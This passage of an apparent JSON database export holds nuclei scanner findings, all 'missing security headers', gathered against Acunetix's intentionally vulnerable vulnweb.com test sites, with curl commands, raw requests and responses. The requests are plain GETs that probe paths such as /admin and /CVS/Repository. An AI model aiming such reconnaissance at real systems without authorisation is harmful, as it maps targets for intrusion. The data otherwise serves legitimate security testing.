(theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(41) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 473, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 75, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'", + "type": "http", + "http_url": "http://testasp.vulnweb.com/T", + "discovered_date": "2024-11-13T02:41:11.434Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /T HTTP/1.1\r\nHost: testasp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nContent-Length: 1233\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:46 GMT\r\nServer: Microsoft-IIS/8.5\r\nX-Powered-By: ASP.NET\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\r\n<html xmlns="http://www.w3.org/1999/xhtml">\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>\r\n<title>403 - Forbidden: Access is denied.</title>\r\n<style type="text/css">\r\n<!--\r\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\r\nfieldset{padding:0 15px 10px 15px;} \r\nh1{font-size:2.4em;margin:0;color:#FFF;}\r\nh2{font-size:1.7em;margin:0;color:#CC0000;} \r\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \r\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;\r\nbackground-color:#555555;}\r\n#content{margin:0 0 0 2%;position:relative;}\r\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\r\n-->\r\n</style>\r\n</head>\r\n<body>\r\n<div id="header"><h1>Server Error</h1></div>\r\n<div id="content">\r\n <div class="content-container"><fieldset>\r\n <h2>403 - Forbidden: Access is denied.</h2>\r\n <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>\r\n </fieldset></div>\r\n</div>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 474, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/.carousel", + "discovered_date": "2024-11-13T02:41:11.596Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.carousel HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 NOT FOUND\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>404 Not Found</title>\n<h1>Not Found</h1>\n<p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 475, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/CVS/Repository", + "discovered_date": "2024-11-13T02:41:11.762Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /CVS/Repository HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 8\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:56 GMT\r\nEtag: "4dca64a4-8"\r\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\r\nServer: nginx/1.19.0\r\n\r\nacupart\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 476, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:41:11.920Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 308 PERMANENT REDIRECT\r\nConnection: close\r\nContent-Length: 253\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nLocation: http://localhost/admin/\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>Redirecting...</title>\n<h1>Redirecting...</h1>\n<p>You should be redirected automatically to target URL: <a href="http://localhost/admin/">http://localhost/admin/</a>. If not click the link.", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 477, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202", + "discovered_date": "2024-11-13T02:41:12.069Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/app/libs/sessvars.js:202 HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 478, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48' 'http://testhtml5.vulnweb.com/ajax/archive'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/ajax/archive", + "discovered_date": "2024-11-13T02:41:12.229Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /ajax/archive HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36 Edg/91.0.864.48\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 2\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n[]", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 479, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/login'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/login", + "discovered_date": "2024-11-13T02:41:12.376Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 405 METHOD NOT ALLOWED\r\nConnection: close\r\nContent-Length: 178\r\nAllow: POST, OPTIONS\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">\n<title>405 Method Not Allowed</title>\n<h1>Method Not Allowed</h1>\n<p>The method is not allowed for the requested URL.</p>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 480, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/comment", + "discovered_date": "2024-11-13T02:41:12.512Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /comment HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <!--<link href="http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css" rel="stylesheet">-->\n <link 